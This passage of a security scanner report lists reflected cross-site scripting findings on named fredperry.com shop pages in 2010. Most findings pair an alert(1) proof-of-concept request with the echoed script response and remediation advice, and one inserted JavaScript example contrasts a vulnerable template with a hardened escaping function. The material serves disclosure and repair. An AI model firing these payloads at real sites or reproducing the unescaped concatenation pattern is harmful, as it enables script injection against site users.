GET /limited-edition1a422"-alert(1)-"8f681c0c66b/women/bags/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ta15vgogrnorgonqfudmjnrj76; expires=Tue, 09-Nov-2010 17:14:58 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition1a422"-alert(1)-"8f681c0c66b/women/bags/");
//]]>
...[SNIP]...

1.151. http://www.fredperry.com/limited-edition/women/bags/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/bags/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6b43"-alert(1)-"406580c4491 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/womena6b43"-alert(1)-"406580c4491/bags/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=sdbh97r4md7k7ln26gr9jls147; expires=Tue, 09-Nov-2010 17:15:32 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/womena6b43"-alert(1)-"406580c4491/bags/");
//]]>
...[SNIP]...

1.152. http://www.fredperry.com/limited-edition/women/bags/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/bags/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dba45"-alert(1)-"8611336e635 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/bagsdba45"-alert(1)-"8611336e635/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=79culemoq5vvafjn57qrqbp0k5; expires=Tue, 09-Nov-2010 17:15:56 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/bagsdba45"-alert(1)-"8611336e635/");
//]]>
...[SNIP]...

1.153. http://www.fredperry.com/limited-edition/women/bags/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/bags/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a888"-alert(1)-"e9449111db7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/bags/?1a888"-alert(1)-"e9449111db7=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=mb2m8bt9ennbk1klnk1ot8qpf5; expires=Tue, 09-Nov-2010 17:14:17 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/bags/?1a888"-alert(1)-"e9449111db7=1");
//]]>
...[SNIP]...
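The reflected line above is the same in every finding that follows: the request URI is concatenated into a double-quoted JavaScript string literal, and the payload's first quote closes that literal so that -alert(1)- is parsed as code. The following is an added example, not code from the Hoyt LLC report or from the fredperry.com site: it models that server-side concatenation and a hardened replacement, then executes both with a stub tracker so the difference is observable. The request URI is taken from finding 1.153; the template functions, the stub tracker and the stub alert() are assumptions.

```javascript
// Added example; not code from the Hoyt LLC report or from fredperry.com.
// Models the server-side template behind findings 1.153 to 1.168 and a
// hardened replacement. REPORTED_URI is the request-target from finding
// 1.153; everything else here is an assumption made for the demonstration.

// Request URI from the report's request line (the scanner's payload sits in
// the parameter name).
const REPORTED_URI = '/limited-edition/women/bags/?1a888"-alert(1)-"e9449111db7=1';

// Vulnerable pattern: the raw request URI is dropped into a double-quoted JS
// string literal. A " in the input terminates the literal and the rest of the
// input is parsed as code: "..."-alert(1)-"..." is a valid expression.
function vulnerableSnippet(requestUri) {
  return 'pageTracker._trackPageview("' + requestUri + '");';
}

// Hardened pattern: serialise the value as a JS string literal. JSON.stringify
// escapes ", \ and control characters; the extra replacement turns <, >, &, /
// and the line terminators U+2028/U+2029 into \uXXXX escapes so the literal
// can neither close the enclosing <script> element (</script>) nor be split
// by a character that older engines treat as a newline inside a string.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\/\u2028\u2029]/g, (c) =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

function hardenedSnippet(requestUri) {
  return 'pageTracker._trackPageview(' + jsStringLiteral(requestUri) + ');';
}

// Run a generated snippet the way the browser would run the inline script,
// with a stub tracker and a stub alert() that record what was called.
function runSnippet(snippet) {
  const seen = { alerts: 0, tracked: [], error: null };
  const pageTracker = { _trackPageview: (p) => { seen.tracked.push(p); } };
  const alert = (x) => { seen.alerts += 1; return x; };
  try {
    new Function('pageTracker', 'alert', snippet)(pageTracker, alert);
  } catch (e) {
    seen.error = e.name; // a syntax error would show up here
  }
  return seen;
}

function demo() {
  const v = runSnippet(vulnerableSnippet(REPORTED_URI));
  const h = runSnippet(hardenedSnippet(REPORTED_URI));
  console.log('vulnerable:', vulnerableSnippet(REPORTED_URI));
  console.log('  alert() calls:', v.alerts, ' value tracked:', v.tracked);
  console.log('hardened:  ', hardenedSnippet(REPORTED_URI));
  console.log('  alert() calls:', h.alerts, ' value tracked:', h.tracked);
  return { vulnerable: v, hardened: h };
}

if (typeof require !== 'undefined' && require.main === module) {
  demo();
}
```

Running the file with node shows the vulnerable snippet invoking alert() once and handing the tracker NaN (the result of string minus function result minus string), while the hardened snippet invokes nothing and hands the tracker the original URI unchanged. The same jsStringLiteral logic is what a PHP template would need to apply before echoing, or the argument can be omitted so ga.js reads the location itself.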

1.154. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/blank-canvas-ann-sofie-back/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cc77"-alert(1)-"8df6d5753ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that is unavoidable, the value must be emitted as a JavaScript string literal with the quote, backslash, <, >, &, / and line-terminator characters written as \xHH or \uHHHH escapes; HTML entity encoding is the wrong encoding for this context. In this case the echoed value is the raw request URI passed to _trackPageview; the ga.js tracker records the current document location when that argument is omitted, so dropping the argument removes the server-side concatenation entirely. The findings in this report that reflect through this _trackPageview call share one sink, so a single template change addresses them together.

Request

GET /limited-edition9cc77"-alert(1)-"8df6d5753ab/women/blank-canvas-ann-sofie-back/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9c63vhna60h3f9d7p0flptleo4; expires=Tue, 09-Nov-2010 17:15:13 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29385

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition9cc77"-alert(1)-"8df6d5753ab/women/blank-canvas-ann-sofie-back/");
//]]>
...[SNIP]...

1.155. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/blank-canvas-ann-sofie-back/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb8ab"-alert(1)-"d3b4f2c0bac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that is unavoidable, the value must be emitted as a JavaScript string literal with the quote, backslash, <, >, &, / and line-terminator characters written as \xHH or \uHHHH escapes; HTML entity encoding is the wrong encoding for this context. In this case the echoed value is the raw request URI passed to _trackPageview; the ga.js tracker records the current document location when that argument is omitted, so dropping the argument removes the server-side concatenation entirely. The findings in this report that reflect through this _trackPageview call share one sink, so a single template change addresses them together.

Request

GET /limited-edition/womenfb8ab"-alert(1)-"d3b4f2c0bac/blank-canvas-ann-sofie-back/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=qjpnguf6q36k2ksu35vp7htro0; expires=Tue, 09-Nov-2010 17:15:39 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29385

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/womenfb8ab"-alert(1)-"d3b4f2c0bac/blank-canvas-ann-sofie-back/");
//]]>
...[SNIP]...

1.156. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/blank-canvas-ann-sofie-back/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36cd8"-alert(1)-"8e2713d7551 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that is unavoidable, the value must be emitted as a JavaScript string literal with the quote, backslash, <, >, &, / and line-terminator characters written as \xHH or \uHHHH escapes; HTML entity encoding is the wrong encoding for this context. In this case the echoed value is the raw request URI passed to _trackPageview; the ga.js tracker records the current document location when that argument is omitted, so dropping the argument removes the server-side concatenation entirely. The findings in this report that reflect through this _trackPageview call share one sink, so a single template change addresses them together.

Request

GET /limited-edition/women/blank-canvas-ann-sofie-back36cd8"-alert(1)-"8e2713d7551/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:16:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=5qbk7rak06nsao4tonccqlbgd3; expires=Tue, 09-Nov-2010 17:16:01 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29385

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/blank-canvas-ann-sofie-back36cd8"-alert(1)-"8e2713d7551/");
//]]>
...[SNIP]...

1.157. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/blank-canvas-ann-sofie-back/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d28b"-alert(1)-"4759f050573 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that is unavoidable, the value must be emitted as a JavaScript string literal with the quote, backslash, <, >, &, / and line-terminator characters written as \xHH or \uHHHH escapes; HTML entity encoding is the wrong encoding for this context. In this case the echoed value is the raw request URI passed to _trackPageview; the ga.js tracker records the current document location when that argument is omitted, so dropping the argument removes the server-side concatenation entirely. The findings in this report that reflect through this _trackPageview call share one sink, so a single template change addresses them together.

Request

GET /limited-edition/women/blank-canvas-ann-sofie-back/?4d28b"-alert(1)-"4759f050573=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ksf7oqbfqpoiif7p6bjfjpq1i3; expires=Tue, 09-Nov-2010 17:14:19 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Ann-Sof
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/blank-canvas-ann-sofie-back/?4d28b"-alert(1)-"4759f050573=1");
//]]>
...[SNIP]...

1.158. http://www.fredperry.com/limited-edition/women/collaboration/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/collaboration/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 138a5"-alert(1)-"4cb6177581 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that is unavoidable, the value must be emitted as a JavaScript string literal with the quote, backslash, <, >, &, / and line-terminator characters written as \xHH or \uHHHH escapes; HTML entity encoding is the wrong encoding for this context. In this case the echoed value is the raw request URI passed to _trackPageview; the ga.js tracker records the current document location when that argument is omitted, so dropping the argument removes the server-side concatenation entirely. The findings in this report that reflect through this _trackPageview call share one sink, so a single template change addresses them together.

Request

GET /limited-edition138a5"-alert(1)-"4cb6177581/women/collaboration/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=qva44de22rhlahod84sf5ghjp5; expires=Tue, 09-Nov-2010 17:14:20 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition138a5"-alert(1)-"4cb6177581/women/collaboration/");
//]]>
...[SNIP]...

1.159. http://www.fredperry.com/limited-edition/women/collaboration/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/collaboration/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4b2d"-alert(1)-"4d7360fd3ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that is unavoidable, the value must be emitted as a JavaScript string literal with the quote, backslash, <, >, &, / and line-terminator characters written as \xHH or \uHHHH escapes; HTML entity encoding is the wrong encoding for this context. In this case the echoed value is the raw request URI passed to _trackPageview; the ga.js tracker records the current document location when that argument is omitted, so dropping the argument removes the server-side concatenation entirely. The findings in this report that reflect through this _trackPageview call share one sink, so a single template change addresses them together.

Request

GET /limited-edition/womena4b2d"-alert(1)-"4d7360fd3ec/collaboration/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=itp8cta29gippdg6e6uvtl3bp4; expires=Tue, 09-Nov-2010 17:14:41 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/womena4b2d"-alert(1)-"4d7360fd3ec/collaboration/");
//]]>
...[SNIP]...

1.160. http://www.fredperry.com/limited-edition/women/collaboration/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/collaboration/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f83df"-alert(1)-"13320d1bbae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that is unavoidable, the value must be emitted as a JavaScript string literal with the quote, backslash, <, >, &, / and line-terminator characters written as \xHH or \uHHHH escapes; HTML entity encoding is the wrong encoding for this context. In this case the echoed value is the raw request URI passed to _trackPageview; the ga.js tracker records the current document location when that argument is omitted, so dropping the argument removes the server-side concatenation entirely. The findings in this report that reflect through this _trackPageview call share one sink, so a single template change addresses them together.

Request

GET /limited-edition/women/collaborationf83df"-alert(1)-"13320d1bbae/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=j3khbiefp69vcvsjqi8s941rl2; expires=Tue, 09-Nov-2010 17:15:02 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/collaborationf83df"-alert(1)-"13320d1bbae/");
//]]>
...[SNIP]...

1.161. http://www.fredperry.com/limited-edition/women/collaboration/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/collaboration/

Issue detail

